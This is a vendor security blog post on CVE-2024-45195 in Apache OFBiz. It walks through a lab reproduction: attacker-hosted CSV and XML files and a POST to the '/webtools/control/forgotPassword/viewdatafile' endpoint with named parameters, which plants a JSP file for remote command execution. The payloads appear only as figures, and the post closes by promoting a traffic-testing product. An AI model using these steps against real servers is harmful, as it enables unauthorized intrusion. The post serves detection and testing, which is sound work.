Apache OFBiz (Open For Business) is an open-source enterprise resource planning (ERP) automation framework developed by Apache Software Foundation. It provides a suite of tools and applications that help organizations manage various business processes. On September 04, 2024, a vulnerability was disclosed by the Rapid7 research team which is identified as CVE-2024-45195. Later this was also added to CISA’s KEV catalogue on February 04, 2025. This vulnerability affects Apache OFBiz versions prior to 18.12.16 and is classified as a Direct Request (‘Forced Browsing’) vulnerability.
In this blog we will take a closer look at the traffic pattern of this attack including how one can reproduce the vulnerable setup and its exploitation.
Vulnerable Setup and Exploitation
Forced Browsing or Direct Request Attack is a web security vulnerability where an attacker manually accesses restricted web resources like files, directories, or web pages without proper authentication or authorization. This is typically done by modifying the URL or requesting hidden resources directly.
As per the information from MITRE and NIST, Apache OFBiz versions 18.12.15 and earlier are vulnerable to forced browsing, which can lead to an unauthenticated remote code execution (RCE) attack. So, to understand the vulnerability better, ATI security researchers have deployed a vulnerable OFBiz server version 18.12.15 locally as shown below –
Figure 1: Vulnerable Apache OFBiz Server (v18.12.15) Running on Localhost
Here are different steps of this attack –
Figure 2: CVE-2024-45195 Attack Steps
- Attacker Prepares Malicious Files
First, the attacker creates 2 malicious files –
Next, these 2 files are hosted in an HTTP server which is controlled by the attacker as shown below –
Figure 3: Malicious Files Hosted in Attacker Controlled HTTP Server
- Attacker Sends POST Request to OFBiz Server
Next, the attacker sends a malicious POST request to upload and store the index.jsp as shown below:
Figure 4: Attacker Sending Malicious POST Request to Vulnerable OFBiz Server
- OFBiz Downloads Malicious Files
Upon receiving the request, the OFBiz server downloads the CSV and XML files from the attacker-controlled HTTP server and then saves the file content inside index.jsp file located in a web-executable directory.
Figure 5: Vulerable OFBiz Server Downloads Malicious Files
- Attacker Executes Remote Code
Figure 6: Attacker Executes OS Command (`ls`) Remotely in Vulnerable OFBiz Server
It demonstrates how a misconfigured file import feature in Apache OFBiz can lead to a full system compromise via remote code execution (RCE).
Attack Traffic Analysis
From the captured traffic we can see that the attacker is sending a malicious HTTP POST request to this “/webtools/control/forgotPassword/viewdatafile” vulnerable endpoint which forces the Apache OFBiz server to fetch and save malicious files.
Figure 7: Sample Malicious HTTP POST Request Sent by Attacker
Here the request body contains some interesting parameters like –
- DATAFILE_LOCATION: Specifies the external URL (attacker-controlled server) of a CSV file that the victim server will download.
- DATAFILE_SAVE: Defines the location inside the victim server where downloaded data file will be stored.
- DATAFILE_IS_URL: Informs the server that DATAFILE_LOCATION is a URL and should be fetched remotely.
- DEFINITION_LOCATION: Specifies the external URL (attacker-controlled server) of an XML schema file that defines how the downloaded CSV file data should be processed.
- DEFINITION _IS_URL: Informs the server that DEFINITION _LOCATION is a URL and should be fetched remotely.
- DEFINITION_NAME: Assigns a name to the definition, which helps the application identify the imported schema format.
1-Arm CVE-2024-45195 Strike in BreakingPoint
At Keysight Technologies, our Application and Threat Intelligence (ATI) team, the security researchers have examined the attack traffic pattern of Direct Request (‘Forced Browsing’) Vulnerability in Apache OFBiz (CVE-2024-45195) and added a new 1-arm (verified) Strike in ATI-2024-03 StrikePack released on February 26, 2025, as shown below –
Figure 8: New Apache OFBiz Forced Browsing Vulnerability Strike in BPS
This Strike exploits a forced browsing vulnerability in Apache OFBiz. The vulnerability is due to improper access control in the web application. A remote attacker could exploit this vulnerability by accessing restricted URLs directly. Successful exploitation could result in unauthorized access to sensitive information.
Leverage Subscription Service to Stay Ahead of Attacks
Keysight’s Application and Threat Intelligence subscription provides daily malware and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Centre continuously monitors threats as they appear in the wild. Customers of BreakingPoint now have access to attack campaigns for different advanced persistent threats, allowing BreakingPoint Customers to test their currently deployed security control’s ability to detect or block such attacks.